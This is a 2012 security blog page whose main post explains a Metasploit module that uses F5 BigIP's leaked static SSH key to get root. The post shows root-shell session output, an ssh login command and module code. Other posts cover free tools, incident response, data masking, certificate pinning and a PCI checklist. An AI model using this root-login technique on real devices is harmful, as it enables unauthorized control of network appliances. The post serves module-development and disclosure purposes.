Tuesday, June 26, 2012

Press F5 for root shell

As HD mentioned, F5 has been inadvertently shipping a static ssh key that can be used to authenticate as root on many of their BigIP devices. Shortly after the advisory, an anonymous contributor hooked us up with the private key.

Getting down to business, here it is in action:

    18:42:35 0 exploit(f5_bigip_known_privkey) > exploit

    [+] Successful login
    [*] Found shell.
    [*] Command shell session 3 opened ([redacted]:52979 -> [redacted]:22) at 2012-06-22 18:42:43 -0600

    id; uname -a
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    Linux [redacted] 2.4.21-10.0.1402.0smp #2 SMP Mon Feb 15 10:23:56 PST 2010 i686 athlon i386 GNU/Linux
    ^Z
    Background session 3? [y/N]  y

    18:42:35 1 exploit(f5_bigip_known_privkey) >

Of course, since it's just a regular ssh key, you can simply drop it in a file and use a standard ssh client.

    ssh -i ~/.ssh/f5-bigip.priv root@8.8.8.8

The advantage of using Metasploit to exploit this weakness is in the session management and rapid post-exploitation capabilities that the framework offers.
This bug is also interesting in that it gave us a good test case for using static SSH credentials in an exploit module rather than an auxiliary module. The key difference between exploit and auxiliary modules is usually the need for a payload: if it needs a payload, it's an exploit; otherwise, it's auxiliary. In this case it's a little blurry, though, because the module results in a session, which is typically an exploit trait. Some of our authentication bruteforce scanners get around this with some Ruby acrobatics so they can still create a session despite not having a payload or a handler.

From a module developer perspective, this exploit has a few interesting aspects that you won't see elsewhere.
First, and probably most important, it doesn't upload a payload to the victim. The connection itself becomes a shell, so it doesn't need one, but that presents a bit of a problem with the framework's design. Fortunately there is a payload for exactly this situation: cmd/unix/interact. This simple payload is different from most; all it does is shunt commands from the user straight to the socket and back. It uses a "find" handler, similar to the way a findsock payload works. To tell the framework about the payload and handler this exploit requires, we need a block in the module info like so:

    'Payload'     => {
      'Compat'  => {
        'PayloadType'    => 'cmd_interact',
        'ConnectionType' => 'find',
      },
    },

Since there is really only one payload that works with this exploit, it also makes sense to set it by default:

    'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },

Next, it uses our modified Net::SSH library to connect to the victim. Most exploits will include Msf::Exploit::Remote::Tcp or one of its descendants; those related mixins all set up the options everyone is familiar with: RHOST, RPORT, etc. Since this one does not, we have to do it manually like so:

    register_options(
      [
        # Since we don't include Tcp, we have to register this manually
        Opt::RHOST(),
        Opt::RPORT(22),
      ], self.class
    )

Lastly, because the handler is of type "find", we must call handler() to get a session. Most Remote::Tcp exploits don't have to do this if they are not compatible with "find", because the handler will spawn a session whenever a connection is made (either reverse or bind). However, all exploits that *are* compatible with "find" payloads must call handler() at some point. Normally there is a global socket created by the Tcp mixin when you call connect(), but in this case we need to let the handler know that our socket is now a shell.

    def exploit
      conn = do_login("root")
      if conn
        print_good "Successful login"
        handler(conn.lsock)
      end
    end

This was a fun module to write. The devices it targets can be a goldmine for a pentester who likes packets, since they're basically a giant packet sink that lets you read and modify traffic willy-nilly. ARP spoofing is noisy and DNS poisoning is hard; let's just own the firewall.

Free Tools

Of course the first is going to be Rapid7 and the Metasploit Framework:

https://github.com/rapid7/metasploit-framework
Other companies' free tools sections:
Sunera: http://security.sunera.com/p/tools.html
Immunity Inc: http://immunityinc.com/resources-freesoftware.shtml
SecureState: http://www.securestate.com/Research%20and%20Innovation/Pages/Tools.aspx
Core Security: http://corelabs.coresecurity.com/index.php?module=Wiki&action=list&type=tool
Hex-Rays: http://www.hex-rays.com/products/ida/support/download_freeware.shtml
Spider Labs: https://www.trustwave.com/spiderLabs-tools.php and https://github.com/SpiderLabs
RandomStorm: http://www.randomstorm.com/free-security-tools.php
SensePost: http://www.sensepost.com/labs/tools/pentest
Mc^H^H Foundstone: http://www.mcafee.com/us/downloads/free-tools/index.aspx
Stach and Liu: http://www.stachliu.com/resources/tools/
Secure Ideas: http://www.secureideas.net/publications.php (Projects on the right)
Buguroo: http://blog.buguroo.com/?cat=6
IOActive: http://ioactive.com/ioactive_labs_tools.html
HP: http://bit.ly/SWFScan_New
NirSoft: http://www.nirsoft.net/
Joeware: http://www.joeware.net/freetools/
and of course Microsoft Sysinternals: http://technet.microsoft.com/en-us/sysinternals/bb842062.aspx
Thanks to Room362 for publishing this.

Monday, June 4, 2012

nullcon Goa 2012: An effective Incident Response Triage framework in the age of APT - By Albert Hui

The talk begins by introducing the dilemmas facing modern-day organizations, covering:

1. the scalability challenge (the intrinsic imbalance between attackers and defenders -- e.g. it costs attackers almost nothing to generate large amounts of obfuscated or even manually modified malware payloads, but it is exponentially more expensive to scale up the defense against them),

2. traditional IR / forensics capabilities that are not focused on scalability -- e.g. it takes half a day just to image hard drives and another day to come up with a forensic report, and

3. the fatal weakness in the common HR model -- e.g. incompetent first-tier IR / forensic staff who neglect to collect vital evidence in time or fail to notice potent exploitation (e.g. "just another fake AV, let's get the box rebuilt"). All too often, misguided management decisions drive CSIRTs to self-destruction -- management is frustrated at not achieving results commensurate with the resources thrown at the problem, and analysts get burnt out fighting an unwinnable war.




Al then takes a step back and reframes the situation as an economic problem. I agree with him on this: with the use of strategic models we can highlight the places where mitigations can start winning. He presents his vision of an effective CSIRT -- all the way from strategic direction, organizational structure, and the right level of empowerment, to the right metrics and mitigation principles.

Interesting presentation.

Understanding and Selecting Data Masking: Technical Architecture

Today we will discuss platform architectures and deployment models. Before I jump into the architectural models, it’s worth mentioning that these architectures are designed in response to how enterprises use data. Data is valuable because we use it to support business functions. Data has value in use. The more places we can leverage data to make decisions, the more valuable it is. However, as we have seen over the last decade, data propagation carries many risks. Masking architectures are designed to fit within existing data management frameworks and mitigate risks to information without sacrificing usefulness. In essence we are inserting controls into existing processes, using masking as a guardian, to identify risks and protect data as it migrates through the enterprise applications that automate business processes.

As I mentioned in the introduction, we have come a long way from masking as nothing more than a set of scripts run by an admin or database administrator. Back then you connected directly to a database, or ran scripts from the console, and manually moved files around. Today’s platforms proactively discover sensitive data and manage policies centrally, handling security and data distribution across dozens of different types of information management systems, automatically generating masked data as needed for different audiences. Masking products can stand alone, serving disparate data management systems simultaneously, or be embedded as a core function of a dedicated data management service.

Base Architecture


  • Single Server/Appliance: A single appliance or software installation that performs static ‘ETL’ data masking services. The server is wholly self-contained – performing all extraction, masking, and loading from a single location. This model is typically used in small and mid-sized enterprises. It can scale geographically, with independent servers in regional offices to handle masking functions, usually in response to specific regional regulatory requirements.
  • Distributed: This option consists of a central management server with remote agents/plug-ins/appliances that perform discovery and masking functions. The central server distributes masking rules, directs endpoint functionality, catalogs locations and nature of sensitive data, and tracks masked data sets. Remote agents periodically receive updates with new masking rules from the central server, and report back sensitive data that has been discovered, along with the results of masking jobs. Scaling is by pushing processing load out to the endpoints.
  • Centralized Architecture: Multiple masking servers, centrally located and managed by a single management server, are used primarily for production and management of masked data for multiple test and analytics systems.
  • Proxy/Bridge Cluster: One or more appliances or agents that dynamically mask streamed content, typically deployed in front of relational databases, to provide proxy-based data masking. This model is used for real-time masking of non-static data, such as database queries or loading into NoSQL databases. Multiple appliances provide scalability and failover capabilities. This may or may not be used in a two-tier architecture.

Appliances, software, and virtual appliance options are all available. But unlike most security products, where appliances dominate the market, masking vendors generally deliver their products as software. Support for Windows, Linux, and UNIX is common, as is support for many types of files and relational databases. Virtual appliance deployment is common among the larger vendors but not universal, so inquire about availability if that is key to your IT service model.

A key masking evolution is the ability to apply masking policies across different data management systems (file management, databases, document management, etc.) regardless of platform type (Windows vs. Linux vs. …). Modern masking platforms are essentially data management systems, with policies set at a central location and applied to multiple systems through direct connection or remote agent software. As data is collected and moved from point A to point B, one or more data masks are applied to one or more ‘columns’ of the data.
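
To make that last point concrete, here is a minimal Ruby sketch of an ETL-style masking pass over a flat file: rows are extracted from a source, a mask is applied to the sensitive columns, and the result is loaded into a new file. The file and column names are invented for the example; a real platform drives this from centrally managed policies and supports many more mask types.

    require 'csv'
    require 'digest'

    # Columns treated as sensitive -- hypothetical names for this example
    MASKED_COLUMNS = %w[ssn email]

    # Deterministic mask: the same input always yields the same token,
    # which preserves joins and referential integrity across masked data sets
    def mask(value)
      'MASKED-' + Digest::SHA256.hexdigest(value.to_s)[0, 12]
    end

    # Extract rows from the source, transform the sensitive columns, load the result
    CSV.open('customers_masked.csv', 'w') do |out|
      CSV.foreach('customers.csv', headers: true).with_index do |row, i|
        out << row.headers if i.zero?
        MASKED_COLUMNS.each { |col| row[col] = mask(row[col]) if row[col] }
        out << row
      end
    end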

Deployment and Endpoint Options


While masking architecture is conceptually simple, there are many different deployment options, each particularly suited to protecting one or more data management systems. And given masking technologies must work on static data copies, live database repositories, and dynamically generated data (streaming data feeds, application generated content, ad hoc data queries, etc.), a wide variety of deployment options are available to accommodate the different data management environments. Most companies deploy centralized masking servers to produce safe test and analytics data, but vendors offer the flexibility to embed masking directly into other applications and environments where large-footprint masking installations or appliances are unsuitable. The following is a sample of the common deployments used for remote data collection and processing.

Agents: Agents are software components installed on a server, usually the same server that hosts the data management application. Agents have the option of being as simple or advanced as the masking vendor cares to make them. They can be nothing more than a data collector, sending data back to a remote masking server for processing, or might provide masking as data is collected. In the latter case, the agent masks data as it is received, either completely in memory or from a temporary file. Agents can be managed remotely by a masking server or directly by the data management application, effectively extending data management and collaboration system capabilities (e.g., MS SharePoint, SAP). One of the advantages of using agents at the endpoint rather than in-database stored procedures – which we will describe in a moment – is that all traces of unmasked data can be destroyed. Either by masking in 'ephemeral' memory, or by ensuring temporary files are overwritten, sensitive data is not leaked through temporary storage. Agents do consume local processor, memory, and storage – a significant issue for legacy platforms – but only a minor consideration for virtual machines and cloud deployments.
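
A bare-bones Ruby sketch of that agent behavior: data is pulled into memory, masked there, and the temporary collection file is overwritten before it is deleted so no unmasked copy survives on disk. The paths and the card-number pattern are invented for the example.

    require 'securerandom'

    TMP = '/tmp/collector.out'   # hypothetical temp file left by the data collector

    raw = File.binread(TMP)      # pull the collected data into memory

    # Mask in memory: truncate anything that looks like a 16-digit card number
    masked = raw.gsub(/\b\d{16}\b/) { |pan| pan[0, 6] + 'X' * 6 + pan[-4, 4] }

    File.binwrite('/tmp/collector.masked', masked)

    # Overwrite the temporary file with random bytes before unlinking it
    File.binwrite(TMP, SecureRandom.random_bytes(raw.bytesize))
    File.delete(TMP)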

Web Server Plug-ins: Technically a form of agent, these plug-ins are installed as web application services, as part of an Apache/web application stack used to support the local application which manages data. Plug-ins are an efficient way to transparently implement masking within existing application environments, acting on the data stream before it reaches the application or extending the application's functionality through Application Programming Interface (API) calls. This means plug-ins can be managed by a remote masking server through web API calls, or directly by the larger data management system. Deployment in the web server environment gives plug-ins the flexibility to perform ETL, in-place, and proxy masking. Proxy agents are most commonly used to decipher XML data streams, and are increasingly common for discovering and masking data streams prior to loading into "Big Data" analytic databases.
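
As a toy illustration of the plug-in idea, the Ruby sketch below is a Rack middleware that masks anything resembling a US Social Security number in outgoing response bodies. Commercial plug-ins are policy-driven and far more careful about content types and streaming; this only shows where in the stack such a component sits.

    # Rack middleware that rewrites response bodies before they leave the app
    class MaskingMiddleware
      SSN = /\b\d{3}-\d{2}-\d{4}\b/

      def initialize(app)
        @app = app
      end

      def call(env)
        status, headers, body = @app.call(env)
        masked = []
        body.each { |chunk| masked << chunk.gsub(SSN, 'XXX-XX-XXXX') }
        body.close if body.respond_to?(:close)
        headers.delete('Content-Length')   # the body length may have changed
        [status, headers, masked]
      end
    end

    # In config.ru, ahead of the application (MyApp is a placeholder):
    #   use MaskingMiddleware
    #   run MyApp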

Stored Procedures/Triggers: A stored procedure is basically a small script that resides and runs inside a database. A trigger is a small function that manipulates data as records are inserted and updated in a database. Both these database features have been used to implement data masking. Stored procedures and triggers take advantage of the database's natural capabilities to apply masking functions to data, seamlessly, inside the database. They can be used to mask 'in-place', replacing sensitive data, or periodically to create a masked 'view' of the original data.
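
To make the trigger idea concrete, here is a small Ruby sketch against SQLite via the sqlite3 gem -- chosen purely for illustration; a real deployment would use the target database's own procedural language. The trigger rewrites the email column as each row is inserted, keeping only the domain.

    require 'sqlite3'   # assumes the sqlite3 gem is installed

    db = SQLite3::Database.new('masking_demo.db')

    db.execute('CREATE TABLE IF NOT EXISTS customers (id INTEGER PRIMARY KEY, email TEXT)')

    # Mask the local part of the address as each record lands, keeping the domain
    db.execute <<~SQL
      CREATE TRIGGER IF NOT EXISTS mask_email AFTER INSERT ON customers
      BEGIN
        UPDATE customers
           SET email = 'user_' || NEW.id || '@' || substr(NEW.email, instr(NEW.email, '@') + 1)
         WHERE id = NEW.id;
      END
    SQL

    db.execute('INSERT INTO customers (email) VALUES (?)', ['alice@example.com'])
    p db.execute('SELECT email FROM customers')   # => [["user_1@example.com"]]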

ODBC/JDBC Connectors: ODBC stands for Open Database Connectivity and JDBC for Java Database Connectivity; each offers a generic programmatic interface to any type of relational database. These interfaces are used by applications that need to work directly with the database to query and update information. You can think of it like a telephone call between the masking platform and the database: the masking server establishes its identity to the database, asks for information, and then hangs up when the data has been transferred. Because the masking platform can issue any database query, it's ideal for pulling incremental changes from a database and filtering out unneeded data. This is critical for reducing the size of the data set, reducing the total amount of processing power required to mask, and making extraction and load operations as efficient as possible. These interfaces are most commonly used to retrieve information for ETL-style deployments, but are also leveraged in conjunction with stored procedures to implement in-place masking.
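
And a loose Ruby sketch of that incremental pull, again using SQLite as a stand-in for a real ODBC/JDBC connection; the table, the updated_at column, and the bookmark file are all invented for the example.

    require 'sqlite3'

    db = SQLite3::Database.new('source.db')

    # Only pull rows changed since the last masking run, and only the columns
    # the downstream environment actually needs
    bookmark = File.exist?('.last_run') ? File.read('.last_run').strip : '1970-01-01 00:00:00'

    rows = db.execute(<<~SQL, [bookmark])
      SELECT id, email, updated_at
        FROM customers
       WHERE updated_at > ?
    SQL

    rows.each do |id, email, _updated_at|
      puts "#{id}: #{email.sub(/\A[^@]+/, 'masked')}"   # crude mask for the demo
    end

    File.write('.last_run', Time.now.strftime('%Y-%m-%d %H:%M:%S'))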

That’s plenty to contemplate for today. Next I will talk in detail about management capabilities – including discovery, policies, data set management, and advanced data masking features.

- Adrian Lane

SSL certificate safety bolstered by standards that lessen dependence on CAs | Naked Security

2011 was a bad year for certificate authorities (CAs) and the privacy of internet users, as multiple successful attacks against CAs resulted in a reduction in confidence in the basic structure of trust that SSL/TLS depends on.
Last summer Moxie Marlinspike proposed a new system called Convergence that puts the decision about whom to trust in the hands of users. There are some technical challenges with Marlinspike's approach, and to date not many people have embraced the technology.
Within the last 6 months, two new proposals have come forward that look to make a more gradual, compatible transition away from the current model possible.
One proposed by Google engineers is called Public Key Pinning Extension for HTTP, while another similar idea backed by Marlinspike and Trevor Perrin is called Trust Assertions for Certificate Keys (TACK).
Some browsers like Google's Chrome have already implemented a similar approach called certificate pinning, but the implementation doesn't scale. Google Chrome ships with a set of pre-defined high-profile certificates installed for services like Gmail that are "pinned" and do not rely on CAs to validate.
This is how the DigiNotar CA breach was discovered. Users of Chrome and Gmail in Iran began getting warnings that their traffic was being intercepted by a man-in-the-middle attack through falsely signed certificates.
Hard coding certificates for more than a handful of sites is highly impractical though, and these new proposals address the scalability problem in an elegant way.
Initial contact to an HTTPS server will work the same as it does now, relying on CAs to verify you are talking to the right site. However, sites that support these new extensions could offer an extra digital signature of their certificate, signed by the site owner.
Your browser could keep a copy of this signature and "pin" it to identify a known public key that represents that site.
Subsequent visits would then check the signature of any certificates presented not only with the CAs, but also against the copy of the public key you pinned from a previous visit.
This means an attacker wishing to perform a man-in-the-middle attack would not only have to compromise a certificate authority, but also compromise the private key possessed by the web site operator.
Ultimately it lessens our dependence on the security of CAs by putting more power in the hands of web site operators and individuals.
This diversification of trust is a necessary step toward more independent verification of trust and potentially eliminating the need for CAs in the future.
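
To see what pinning amounts to mechanically, here is a small Ruby sketch of the trust-on-first-use idea: the first connection records the SHA-256 fingerprint of the server's public key, and later connections refuse to proceed if the key no longer matches, even when the certificate chain still validates. The host and pin file are placeholders, and this illustrates the concept only; it is not an implementation of either IETF draft.

    require 'socket'
    require 'openssl'
    require 'digest'

    HOST     = 'www.example.com'            # placeholder host
    PIN_FILE = File.expand_path('~/.pin_demo')

    def public_key_fingerprint(host)
      tcp = TCPSocket.new(host, 443)
      ctx = OpenSSL::SSL::SSLContext.new
      ctx.verify_mode = OpenSSL::SSL::VERIFY_PEER          # normal CA validation still happens
      ctx.cert_store  = OpenSSL::X509::Store.new.tap(&:set_default_paths)
      ssl = OpenSSL::SSL::SSLSocket.new(tcp, ctx)
      ssl.hostname = host                                  # SNI
      ssl.connect
      ssl.post_connection_check(host)                      # hostname check against the cert
      fp = Digest::SHA256.hexdigest(ssl.peer_cert.public_key.to_der)
      ssl.close
      tcp.close
      fp
    end

    pinned  = File.exist?(PIN_FILE) ? File.read(PIN_FILE).strip : nil
    current = public_key_fingerprint(HOST)

    if pinned.nil?
      File.write(PIN_FILE, current)                        # first visit: pin the key
      puts "Pinned #{HOST}: #{current}"
    elsif pinned == current
      puts 'CA chain validates AND the public key matches the pin.'
    else
      abort 'WARNING: public key changed since the last visit -- possible man-in-the-middle.'
    end
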
Both proposals are in draft form with the IETF and there are many technical details not covered here. If you want to understand the differences and specifics, I recommend reading the proposals themselves as they are not terribly long.

PCI DSS audit checklist

What is PCI DSS?

The Payment Card Industry Data Security Standard (PCI DSS) is an information security standard for organizations that handle cardholder information for the major debit, credit, prepaid, e-purse, ATM, and POS cards.



Pentestit has compiled a PCI DSS audit checklist in Excel, which anyone can use for both implementation and audit of a payment card environment. The Payment Card Industry Data Security Standard is widely used by banks, merchants, bill payment providers, and others.

The PCI DSS audit checklist spreadsheet contains four sheets:

  1. Introduction
  2. v1.1
  3. v1.2
  4. v2.0
We would love your responses, suggestions, or anything else.
  • Note: the password for read and write access is pentestit